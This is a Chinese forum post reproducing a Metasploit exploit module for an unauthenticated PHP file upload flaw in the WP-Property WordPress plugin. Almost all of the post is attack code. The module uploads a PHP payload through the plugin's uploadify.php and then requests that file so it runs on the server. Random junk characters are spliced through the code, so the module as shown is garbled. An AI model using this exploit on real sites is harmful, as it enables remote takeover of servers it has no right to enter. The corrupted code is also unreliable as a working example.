WordPress WP-Property PHP 文件上传漏洞* v: q* G6 C# F5 g1 ~; A
B0 [* @: r: s# r" E% O ## # This file is part of the Metasploit Framework and may be subject to
: m, G; h0 X$ H8 n: ], [1 l. Y! s8 |& j$ e% C8 V! b3 d- D
# redistribution and commercial restrictions. Please see the Metasploit( [: Y2 }; R4 p+ e
# C; B( f# I* ~# u
# Framework web site for more information on licensing and terms of use.
' g; e0 U" A- q* e- y3 [- z6 e8 J! Z
# http://metasploit.com/framework/ ##& L: d& j; Y4 b! c
* k9 y+ j3 c) Q# I ; L/ y$ Y4 F5 E3 b' @$ T0 r/ A
0 }6 {9 s+ `/ x& }/ @& \
: f! J' z5 a- r4 l' `* M+ r8 H) [- N4 j
require 'msf/core'2 I( o/ D5 C r/ j& h& L
require 'msf/core/exploit/php_exe'
& C+ j Q O4 m3 i v! A( ?( E2 s [) M# L
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
) `1 a$ q! |7 T2 b: U'Description' => %q{ x+ t& _- x, m+ @' P4 b
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
9 k1 q9 c, c6 Z[
, S4 p. F8 p8 D( j% o) q+ m; e5 l$ u'Sammy FORGIT', # initial discovery2 D, D2 {/ k2 f! Q' ^% X5 X
'James Fitts <fitts.james[at]gmail.com>' # metasploit module6 d7 N, @6 f9 ]; ?
],5 Z3 m3 h" n8 _9 ]
'License' => MSF_LICENSE,2 C' y, t! K. V' d
'References' =>
; V0 y) Y" |; q* N[# p6 D5 b! c' z8 n* Y I
[ 'OSVDB', '82656' ],, t2 \$ u* ^1 t3 J4 g
[ 'BID', '53787' ],
& j7 ^( |5 Z/ G6 e+ F4 I5 R0 I[ 'EDB', '18987'],
8 i+ s1 K. [) t/ T* u- \[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
! x! N% J0 C) p],+ e( N: Y" H' J
'Payload' =>
4 q8 ?! B+ S6 L1 R{ m" Q4 Q# ^( Z# X: R( D( ?% k
'BadChars' => "\x00",
, H3 c5 [1 s9 [# C2 A},
" G8 u! U5 t1 ~' V3 d: O'Platform' => 'php',
) Z1 d J$ Y5 E. V'Arch' => ARCH_PHP,
: x+ S. D9 P$ c/ z; q* {4 r9 m/ n'Targets' =>
$ {, P; O+ Z+ b& e% r[
# f6 [1 D0 [/ g4 T) m; ]; H[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
4 S. D$ w' @( _6 S: I# a7 y[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]5 z8 e7 w5 w: h
],
- v( q9 ^' o- c' `/ D6 y'DefaultTarget' => 0," g# j$ Q$ `% T
'DisclosureDate' => 'Mar 26 2012'))9 ?0 R" a2 N0 Z' o+ c
6 B4 J/ j! `/ Y0 sregister_options() g; N- w' j# m. {
[; k y+ k& L6 F; ]8 x
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']), f2 w+ I4 |. r! d. y- J
], self.class)1 h9 Z; |, o4 o9 K2 E
end7 M! i8 z- B+ S
- C1 N) ^) E6 f6 `' e) H/ |
def check
% x V# n) ^/ ~; juri = target_uri.path% J" C6 m. u$ I. s2 k- w$ f
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
; {3 d* C0 M- s* W'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php": g( `0 Z7 ?7 s
})2 N& u8 h: e# Y8 |4 }+ f; z: E
* L r, V8 f2 N( K! Q0 W2 J @2 ], sif not res or res.code != 200
( V7 ^( Y2 x; t1 d9 n3 Y$ |return Exploit::CheckCode::Unknown
5 I' ]; x8 |: Kend
9 q$ O9 e6 K+ \+ ^2 _6 r' G# F7 Z; F1 M/ V
return Exploit::CheckCode::Appears
: @! h" [3 N* Fend* r3 U% b6 {& C& X1 ^
/ o6 Q+ e7 {! \/ r8 Sdef exploit4 D2 W6 b# b$ k) {* S
uri = target_uri.path
# N" [9 D& o% N& yuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)6 w( [) l: x l
( a( a; P. }3 E( ^4 S% z! M# k0 a
data = Rex::MIME::Message.new' o6 \6 b H# u8 v
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
$ f* B* O' @: u' fdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
9 o9 X' j0 d. u+ Spost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
7 O6 {, j% B1 J% {3 ~4 ^+ J- o8 D& k$ K
print_status("#{peer} - Uploading payload #{@payload_name}"), @2 P8 Z1 P$ a }3 c i' r0 f
res = send_request_cgi({
, Q' L; T1 N' [: z( M9 u+ l'method' => 'POST',
2 D Y5 M+ H5 c- ?9 J2 Q9 R'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",7 |2 E% i$ k7 V* R2 X
'ctype' => "multipart/form-data; boundary=#{data.bound}",
! A. A+ P' ^4 I! k( B'data' => post_data! ]& U. h/ i2 F( k
})
, [/ U& b1 [6 e; Q5 J! e: J
2 S; f/ {; j2 N5 @% R f/ Oif not res or res.code != 200 or res.body !~ /#{@payload_name}/3 a. ]' u( \. j! }7 @" V
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")6 m1 C. e7 n0 S
end- b! p% s. S0 @- E o) a
6 M% i. v n) eupload_uri = res.body
* Q }5 P1 {; \9 X2 {
0 X3 R# E. o5 i2 n2 eprint_status("#{peer} - Executing payload #{@payload_name}")$ v: ]- d* Q4 _+ z
res = send_request_raw({
0 V: k( [% a! N% ~4 k* r! {'uri' => upload_uri,* ` O9 b+ e n+ Q: ]# p. |: ~: E
'method' => 'GET'
8 n k7 M# X0 P( b) W7 g})
4 f8 N4 M& ?$ t1 J5 B6 uend: s5 X0 k& w5 K! c- x: ?% I
end
# O" {- a$ H: ^9 c8 O, f8 M0 f& K% ~9 x3 x
不要问我这写的是什么 怎么利用 我是说msf.
2 j" I1 W/ l9 `. y8 I' W1 c! L$ c' A* O( V; f* ^7 j
|
发表于 2013-1-4 19:51:30
收藏
支持
反对